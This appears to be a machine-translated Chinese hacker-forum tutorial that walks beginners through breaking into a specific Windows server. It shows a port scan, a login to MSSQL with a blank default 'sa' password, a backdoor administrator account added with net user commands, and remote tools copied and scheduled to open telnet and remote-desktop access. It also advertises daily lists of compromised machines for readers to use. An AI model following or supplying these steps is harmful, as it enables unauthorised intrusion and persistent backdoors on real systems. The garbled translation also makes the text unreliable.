****************************************** Shadow Eagle Security Network Kawenwww.cnhacker. CNWW.CHINAEHACKER.NET Hacker Training Base Safety Service Center **************************************************** *** All tutorials online now, almost a vulnerability to enter the system, then launch a series of permissions, leaving the door, etc., in fact, people in the tutorial and study, 90% They are all growing brothers, they need a more comprehensive intrusion report to understand the secrets and associations, so this article is produced. There is no technical content, mainly facing the primary users. :) Shadow eagle The technical forum of the security network will provide the latest broilers and agents for everyone to use and learn every day. The broilers mentioned in this article are from this. Note: The broiler's computer festival for you have received privileges is the basis of broiler Before you have done content, so that you can find your own computer broiler: 211.75.xx discovery in a late night. The outside is scared, only my room is still bright, I wear a black big t-shirt according to the website forum Substance, 211.75.xx's USER is Administrato, Passwd is empty, and the IPC connection habit first ping the website C: /> ping 211.75.x.xping Iceblood.yofor.com [211.75.xx] with 32 Bytes of data: reply from 211.75.xx: bytes = 32 Time <10ms TTL = 254 reply from 211.75.xx: Bytes = 32 TIME <10ms TTL = 254 reply from 211.75.xx: bytes = 32 TIME <10MS TTL = 254 reply From 211.75.xx: bytes = 32 TIME <10ms TTL = 254 ping statistics for 211.75.xx: Packets: Sent = 4, Received = 4, Lost = 0 (0% Loss), Approximate Round Trip Times in Milli-Seconds: Minimum = 0ms, Maximum = 0ms, Average = 0ms It seems that the website is open, and if you press the prompt IP C Connections Note: IPC $ (Internet Process Connection) is a resource shared "named pipe" (everyone says this), it is to make a named pipe with inter-process communication, you can get the corresponding username and password Permissions, use when managing computers and views computer shared resources.
C: /> NET USE ///211.75.xx/iPC ("" / user: "adminititrators" system 1326 error login failed: unknown user name or error password I halo, it seems that the brothers come to change the password, Still from the driver, look at what useful, what is useful, for ten minutes, the flow scan report shows port-> host 211.75.xx port 0139 ... Open port-> host 211.75.xx port 0443. .. Open Port-> Host 211.75.xx Port 080 ... Open port-> Host 211.75.xx port 1433 ... Open ......... The bottom detected the default MSSQL password for the flow of lights for sa haha This time, I have played SUPERSQLEXEC, fill in 211.75.xx in IP, enter SA in User, the connection is taken for a while, come out, we now use the MSSQL default password this vulnerability enters the other party's system C: / Net UserAdmin Administrator User Aa Bblqh Test Xxxxx Ldir Like seems to have many USERs on this machine, and it is not a matter of anyway, and C: / net user kawen kawen / add command successfully c: / net localgroup administrators Kawen / add command succeeds OK, we have successfully added Kawen's username to the administrator now. Exit SQL, we now have to go to IPC here, open dosc: /> NET USE ///211.75. XX / IPC $ "Kawen" / user: "kawen" command is finished, seeing no, we have already done it now on the other IPC is to improve the permissions, of course, you can use the DameWare Mini Remote Control through the graphic mode The other party's computer is like 3389.c: /> copy srv.exe //211.75.xx/admin $ C: /> Net Time //211.75.x.xc: /at ///211.75.xx 11: 05 SRV.EXE The above three steps are what we want to start open 99 ports Srv.exec: /> Net time //211.75.xx check time no time? If 211.75.xx is currently 2002/6/1 11:05 am, then prepare to start the following command C: /> telnet 211.75.xx 99 C: / WinNT / System32 success, but SRV is a one-time, Also activated next time! So we intend to establish a Telnet service, that is, open the other party's 23-port Copy NTLM.EXE ///211.75.xx/admin! We can run C: / Winnt / System32> NTLM When "Done" appears, It has started normal then we use Net Start Telnet directly to start Telnet service OK. Now we have used IPC to come in. Next is to open a 3389 port. You can log in directly to graphically, please enter the following steps 3389c: /> Query userc: / > echo [components]> C: / kawenc: /> echo tsenable = on >> C: / kawen // This is the installation parameter C: />